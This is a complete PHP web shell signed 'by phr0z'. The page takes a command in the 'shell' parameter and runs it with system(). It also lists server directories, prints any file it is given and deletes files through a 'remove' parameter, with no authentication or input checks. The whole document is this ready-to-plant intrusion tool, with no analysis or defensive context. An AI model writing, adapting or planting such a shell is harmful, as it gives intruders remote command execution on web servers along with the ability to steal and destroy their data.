PHP:
<STYLE type="text/css">
<!--a{text-decoration:none}-->
</STYLE>
<body bgcolor=black>
<font color=white face="courier" size=2>
<div align=right>//by phr0z</div>
PHP shell in <?php echo $_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'] ?> <br>
Server <?php echo $_SERVER['SERVER_NAME']; ?> <br><hr>
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method=GET>
Navigate to:
<input type="text" name="dir" value="<?php echo $dir ?>" size=50>
</form>
<form action="<?php print $_SERVER['PHP_SELF']; ?>" method=GET>
Execute command:
<input type="text" name="shell" size=45>
</form>
<?php
if($_REQUEST['remove'] != NULL)
unlink($_REQUEST['remove']);
if($_REQUEST['file'] != NULL) {
$fp = fopen($_REQUEST['file'], "rb");
if($fp == NULL) {
echo 'Can\'t open file '. $_REQUEST['file'];
die;
}
echo '<br><br><pre>';
fpassthru($fp);
}
if($_REQUEST['dir'] != NULL) {
$dir = $_REQUEST['dir'];
if(is_dir($dir)) {
if($dh = opendir($dir))
echo '<h3>Files in '. $dir .'</h3><br><br>';
while(($file = readdir($dh)) !== false)
if(is_dir($dir.'/'.$file))
echo '<a href="'. $_SERVER['PHP_SELF'] .'?dir='. $dir .'/'. $file .'">'. $file .'</a><br>';
else {
echo '<a href="'. $_SERVER['PHP_SELF'] .'?file='. $dir .'/'. $file .'">'. $file .'</a>';
echo ' [<a href="'. $_SERVER['PHP_SELF'] .'?dir='. $dir .'&remove=' . $dir .'/'. $file .'">'. 'DEL</a>]<br>';
}
closedir($dh);
} else
echo '<br><br>Directory '. $dir .' is invalid.';
}
if($_REQUEST['shell'] != NULL) {
echo '<br><br><pre>';
system($_REQUEST['shell']);
}
?>